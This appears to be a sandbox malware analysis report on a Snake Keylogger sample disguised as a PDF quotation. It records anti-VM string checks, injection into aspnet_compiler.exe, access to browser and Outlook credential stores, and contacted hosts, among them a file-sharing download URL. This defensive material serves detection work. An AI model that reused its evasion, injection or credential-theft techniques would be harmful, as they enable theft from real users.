Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95562	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95109	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 95000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94890	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94669	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94547	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94437	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 94328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597236	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596552	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596230	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594359	Jump to behavior

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3561000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware\|VIRTUAL\|A M I\|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft\|VMWare\|VirtualXjohnYannaZxxxxxxxx
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631206898.0000021FBBA90000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3366946834.000002589383F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 936F0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 258936F0000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3368058853.000002589568D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3368058853.000002589568D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	21 Obfuscated Files or Information	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
https://s24.filetransfer.io/storage/download/BbYQU8RBGGG7	0%	Avira URL Cloud	safe
http://www.zzzprojects.com	0%	Avira URL Cloud	safe
https://bulk-operations.net	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/include-graph).	0%	Avira URL Cloud	safe
https://dapper-plus.net/getting-started-mapping#instance-context-mapping.	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/md5-exception	0%	Avira URL Cloud	safe
https://dapper-plus.net/pricing.	0%	Avira URL Cloud	safe
https://bulk-operations.net/pricing.	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/)	0%	Avira URL Cloud	safe
https://entityframework-extensions.net/pricing.	0%	Avira URL Cloud	safe
https://dapper-plus.net/getting-started-mapping#instance-context-mapping	0%	Avira URL Cloud	safe
https://linqtosql-plus.net/pricing.	0%	Avira URL Cloud	safe
https://s24.filetransfer.io	0%	Avira URL Cloud	safe
https://dapper-plus.net	0%	Avira URL Cloud	safe
http://entityframework-plus.net/	0%	Avira URL Cloud	safe
http://www.microsoft.c)$	0%	Avira URL Cloud	safe
https://reallyfreegeoip.orgp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s24.filetransfer.io	188.114.96.3	true	false	unknown
filetransfer.io	188.114.97.3	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://filetransfer.io/data-package/zWkbOqX7/download	false		high
https://s24.filetransfer.io/storage/download/BbYQU8RBGGG7	false	Avira URL Cloud: safe	unknown
http://filetransfer.io/data-package/zWkbOqX7/download	false		high
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/155.94.241.187	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://entityframework-extensions.net/md5-exception	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bulk-operations.net	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://dapper-plus.net/getting-started-mapping#instance-context-mapping.	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://dapper-plus.net/pricing.	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	aspnet_compiler.exe, 00000004.00000002.3372089325.00000258ADCF0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://microsoft.co	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631206898.0000021FBBAFF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://entityframework-extensions.net/)	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zzzprojects.com	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://bulk-operations.net/pricing.	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://entityframework-extensions.net/include-graph).	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://entityframework-extensions.net/pricing.	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	false	Avira URL Cloud: safe	unknown
https://dapper-plus.net/getting-started-mapping#instance-context-mapping	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://linqtosql-plus.net/pricing.	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	false	Avira URL Cloud: safe	unknown
http://www.microsoft.c)$	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2631206898.0000021FBBAFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.orgp	aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.187p	aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp	false		high
http://entityframework-plus.net/	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895573000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp	false		high
https://filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3394000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955F8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589561E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589560B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895632000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.00000258955A1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895667000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895553000.00000004.00000800.00020000.00000000.sdmp	false		high
